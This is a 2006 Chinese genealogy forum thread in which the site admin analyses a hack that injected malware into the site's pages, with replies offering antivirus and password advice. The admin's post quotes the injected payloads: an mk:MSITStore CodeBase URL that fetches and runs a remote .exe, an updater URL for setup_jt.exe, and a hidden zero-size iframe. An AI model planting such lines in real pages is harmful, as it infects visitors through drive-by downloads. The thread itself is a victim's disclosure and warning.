首页
社区
家园
群组
手机版
开启辅助访问
请登录
注册
搜索
快捷导航
专题
起源
汝南
全清
三袁
伯庸
袁元
天台
修谱
微网
孔子
颜氏
孝经
周礼
礼记
孝经
微博
贴吧
淘宝
微号
官网
社区
世范
四训
分类
二手
招聘
求职
交友
便民
租售
消费
兑换
国学
地名
节日
朝代
大事
干支
名篇
请
登录
后使用快捷导航
没有帐号?
注册
袁氏分支
袁氏寻根
湖广麻城
填川袁氏
鳌公九岗
伯庸后裔
襄阳袁姓
浙东袁氏
袁氏家谱网--
»
论坛
›
袁氏分支
›
袁氏寻根
›
[原创]五月四日网站病毒剖析
返回列表
[原创]五月四日网站病毒剖析
[复制链接]
楼主
电梯直达
袁氏家谱
发表于 2006-5-8 16:25:00
|
只看该作者
|
倒序浏览
|
阅读模式
欢迎注册登录后浏览更多内容!谢谢!
您需要
登录
才可以下载或查看,没有帐号?
注册
x
据守信、小达报道:5月4日以后,我们网站出现了木马病毒,5月6号回来后,我立刻展开了调查,事情如下:
1、病毒为骇客类,侵入了网站修改了网页代码,在网页上加上了如下代码: CodeBase: mk:%40MSITStore%3Amhtml%3Ac%3A\%2Emht%21http://bbs.gemeus.com/q17%2f1.js::/%23.exe
CLSID: {00000000-0000-0000-0000-000000000000}
Extension:
Type: application/x-oleobject
也就是说,捣鬼的网站是http://bbs.gemeus.com/q17%2f1.js::/%23.exe
捣鬼的文件是q17%2f1.js::/%23.exe
2、经过查看临时文件夹,木马病毒将病毒文件寄放在临时文件夹下,妄想运行时,被我的天网防火墙阻止了。在临时文件夹下的几个文件名是:
1.exe
1.js
ah.js
CAY9GX8D.HTM
setup_jt.exe.txt
3、如果大家用三个热键查看进程,其中有上述文件,请结束进程,杀毒。
4、记得病毒当时提示,要把网上文件下载到windows目录下的Downloaded Program Files进行安装,其文件名为:#.exe
5、[update]
num=22
url=http://222.88.88.191/setup_jt.exe
这是病毒更新文件
6、如果5月4号到7号间曾打开过袁氏家谱网站或论坛的朋友,请杀毒。
7、这家伙在我网页尾加上了这样的语句:
<iframe src="http://bbs.gemeus.com/q17/index.htm"width="0" height="0"></iframe>
弹出一个窗口,其内容指向这个论坛。
----这是很不道德的宣传自己论坛的做法。人皆诛之。
分享到:
微信
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
0
转播
分享
支持
0
反对
0
回复
使用道具
举报
沙发
袁冠烛
发表于 2006-5-8 16:39:00
|
只看该作者
真是太可恶了!大家要提高警惕才是。
真是太可恶了!大家要提高警惕才是。
回复
使用道具
举报
板凳
丁九一
发表于 2006-5-10 00:24:00
|
只看该作者
哦,原来是这样.前几天就是无法登录咱们网...
哦,原来是这样.前几天就是无法登录咱们网站.我用江民软件杀了!谢谢大家.
回复
使用道具
举报
地板
袁在田
发表于 2006-5-10 08:30:00
|
只看该作者
太可恶了!那几天我这能上,但找不到各个栏...
太可恶了!那几天我这能上,但找不到各个栏目,我还以为论坛在维护呢。老论坛曾受攻击,守信忙乎了一星期。大家一定要提高警惕,有情况及时向管理员报告。
回复
使用道具
举报
5
#
袁焕文
发表于 2006-5-10 21:00:00
|
只看该作者
我的电脑中毒了!就是那天我打开网站后,我...
我的电脑中毒了!就是那天我打开网站后,我的电脑有警报,可是就是杀不出来!每次都有警报,怎么办呀??
回复
使用道具
举报
6
#
袁资友
发表于 2006-5-11 17:02:00
|
只看该作者
除了用杀毒软件外,建议1、安装超级兔...
除了用杀毒软件外,建议
1、安装超级兔子软件,对电脑垃圾文件进行清理,对注册表进行清理,
2、安装瑞星的KAKA软件,对电脑进行保护,
3、用杀毒软件杀一次毒,
4、也可在线查毒,你如果对电脑系统文件较熟悉,可以把有毒的文件用资源管理器直接删除
5、注意:直接删除文件,搞得不好会使电脑系统崩溃,务必小心!
6、对电脑运行的常用进程记住,到时候抓一幅图,发到QQ群上,请大家分析一下,哪是毒,哪不是毒。
回复
使用道具
举报
7
#
卧龙深处
发表于 2006-5-11 21:15:00
|
只看该作者
现在下载瑞星可装不上。
现在下载瑞星可装不上。
回复
使用道具
举报
8
#
丁九一
发表于 2006-6-9 00:21:00
|
只看该作者
大家使用电脑,什么软件都可以装盗版(不支...
大家使用电脑,什么软件都可以装盗版(不支持),唯独杀毒软件一定要用正版的,是购买的带光盘的,而且要经常升级(每天一次),网路上DOWN的杀毒软件可能会出问题吧(我没DOWN过),要保持高度警惕.
回复
使用道具
举报
9
#
资友
发表于 2006-6-16 09:17:00
|
只看该作者
经过这一阵观察,没有病毒,我认为:...
经过这一阵观察,没有病毒,我认为:
前段时间我们网站代码被加入指向代码的程序是人为的,可能的原因是,我们管理群中,有三人QQ被盗,贼人可能通过聊天记录看到了我们管理员登录的密码和帐号,顺利进去加入的非法链接。
我经过修改网站密码后半个多月来,没有发现问题,充分说明了这一点。
-----------------------------
最后提供管理员管好自己的QQ,用手机或邮件绑一下。尽量不上网吧上网,如果去了,回来后把密码改一下。以防造成QQ被盗。
回复
使用道具
举报
10
#
袁冠烛
发表于 2006-6-16 11:01:00
|
只看该作者
我的还是有那个问题,登录后换面就没了.怎...
我的还是有那个问题,登录后换面就没了.怎么办?谁帮我!
回复
使用道具
举报
返回列表
袁氏家谱网扫码!
Copyright © 1997-2020
袁氏家谱网_论坛
(http://www.yuanscn.com/bbs) 版权所有 All Rights Reserved.
免责声明: 本网不承担任何由内容提供人提供的信息所引起的争议和法律责任。
2022-2030年域名赞助人:
浙江袁巨高
2021-2025年空间赞助人:
浙江袁巨高
鄂ICP备11010464号-1 号 公安机关备案号 42062502000005
快速回复
返回顶部
返回列表